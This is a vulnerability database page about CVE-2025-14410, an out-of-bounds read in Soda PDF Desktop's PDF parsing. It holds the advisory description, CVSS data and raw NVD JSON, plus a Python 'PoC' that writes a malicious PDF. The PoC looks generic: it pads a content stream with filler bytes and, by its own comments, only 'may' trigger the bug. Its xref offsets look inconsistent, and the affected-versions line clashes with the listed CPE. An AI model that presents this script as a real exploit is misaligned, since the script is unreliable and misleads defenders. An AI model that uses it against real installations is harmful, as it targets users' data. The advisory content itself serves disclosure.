Security Vulnerability Report
中文
CVE-2025-14410 CVSS 5.5 MEDIUM

CVE-2025-14410

Published: 2025-12-23 22:15:48
Last Modified: 2026-01-21 20:55:48
Source: [email protected]

Description

Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27142.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop 12.x < 最新版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14410 PoC - Malformed PDF for Soda PDF Desktop # This PoC demonstrates the structure needed to trigger the OOB read vulnerability # Note: This is for educational and testing purposes only from construct import * import struct def create_malformed_pdf(): """ Create a malformed PDF that may trigger OOB read in Soda PDF Desktop The vulnerability exists in PDF parsing where bounds checking is insufficient """ # Malicious PDF structure to trigger OOB read pdf_content = b"%PDF-1.7\n" # Object with crafted stream data that exceeds expected bounds obj_with_oob_trigger = b"""1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /Resources << /Font << /F1 << /Type /Font /Subtype /Type1 >> >> >> /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj 4 0 obj << /Length 1000 >> stream """ # Crafted content stream with malformed data structures # This attempts to trigger the OOB read in PDF parser stream_data = b"BT\n" stream_data += b"/F1 12 Tf\n" # Malformed inline image or stream data stream_data += b"\x00\x00\x00\x00\x00\x00\x00\x00" * 100 # Padding to trigger bounds issue stream_data += b"\xff\xff\xff\xff\xff\xff\xff\xff" * 50 # More crafted data stream_data += b"\nET\n" endstream = b"\nendstream\nendobj\n" pdf_content += obj_with_oob_trigger + stream_data + endstream # Add cross-reference table and trailer pdf_content += b"""xref 0 5 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n 0000000314 00000 n trailer << /Size 5 /Root 1 0 R >> startxref """ pdf_content += str(len(pdf_content)).encode() pdf_content += b"\n%%EOF" return pdf_content if __name__ == "__main__": pdf_data = create_malformed_pdf() with open("CVE-2025-14410_malicious.pdf", "wb") as f: f.write(pdf_data) print("Malicious PDF created: CVE-2025-14410_malicious.pdf") print("This PoC demonstrates the structure that may trigger the OOB read vulnerability")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14410", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.750", "lastModified": "2026-01-21T20:55:48.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27142."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1083/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.